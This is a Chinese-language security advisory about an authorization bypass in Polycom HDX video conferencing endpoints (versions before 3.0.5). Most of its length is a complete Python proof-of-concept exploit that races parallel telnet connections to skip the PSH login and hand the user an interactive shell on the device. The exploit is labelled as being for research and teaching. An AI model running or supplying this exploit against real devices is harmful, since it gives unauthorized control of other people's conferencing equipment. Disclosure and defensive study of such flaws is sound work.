Polycom HDX Video Endpoints授权安全绕过漏洞

发布日期:2013-01-18
更新日期:2013-03-08

受影响系统:
Polycom HDX Video End Points 3.0.4
 Polycom HDX Video End Points 3.0
 Polycom HDX Video End Points 2.6
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57911
 
Polycom HDX Video Endpoints 是视频会议系统。
 
Polycom HDX Video Endpoints 3.0.5之前版本在实现上存在安全漏洞,攻击者可利用此漏洞绕过某些安全限制并获取受影响设备的未授权访问权限。
 
<*来源:Paul Haas
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/env python
 # Paul Haas <Paul dot Haas at Security-Assessment dot com>
 '''Polycom PSH Command Shell Authorization Bypass Proof of Concept
 Bypass Polycom's PSH telnet login using a flaw with simultaneous
 connections.'''
 import sys,socket,time,threading,readline
 PORT = 23 # Default service port
 THREADS = 6 # Best results vary from 4-8
 BUF = 9200 # For sock.recv buffer
 WAIT = 0.5 # For time.sleep between sock.send and sock.recv
 SHELL = False # Lock shell to a single thread in bypass function
 def check(host,port):
 '''Check for server banner of vulnerable Polycom PSH shell'''
 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 sock.connect((host, port))
 sock.send('hello\n')
 time.sleep(WAIT)
 data = sock.recv(BUF).strip()
 sock.close()
 if 'Welcome to ViewStation' not in data:
 print "[Did not match banner information on %s:%i]: %s" %
(host,port,data)
 exit(2)
 return 0
 def bypass(host, post):
 '''Loop socket connection until login prompt is bypassed'''
 global SHELL
 while not SHELL:
 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 sock.connect((host, port))
 sock.send('whoami\n')
 data = sock.recv(BUF)
 while data:
 if SHELL: break
 elif 'Polycom' in data:
 SHELL = True
 print "[Bypass attack succeeded, spawning interactive shell]:"
 while data:
 print data.strip()
 echo = raw_input("-> ")
 try: sock.send("%s\n" % echo)
 except socket.error: break
 time.sleep(WAIT)
 data = sock.recv(BUF)
 print "[Connection closed]"
 elif 'bind' in data:
 print data.strip()
 sock.send('whoami\n')
 elif 'failed' in data:
 break
 data = sock.recv(BUF)
 sock.close()
 return 0
 if __name__ == '__main__':
 if len(sys.argv) <= 1:
 print __doc__
 print "Usage: %s [HOST] {PORT=%i} {THREADS=%s}" %
 (sys.argv[0],PORT,THREADS)
 exit(1)
 host = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'
 port = int(sys.argv[2]) if len(sys.argv) > 2 else PORT
 threads = int(sys.argv[3]) if len(sys.argv) > 3 else THREADS
 check(host,port)
 print "[Running attack against %s:%i using %i threads]" %
(host,port,threads)
 print "[Look for 'Socket bind error' messages, bypass may take time]"
 for i in range(threads):
 thread = threading.Thread(target=bypass, args=(host,port,))
 thread.start()

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Polycom
 -------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://www.polycom.com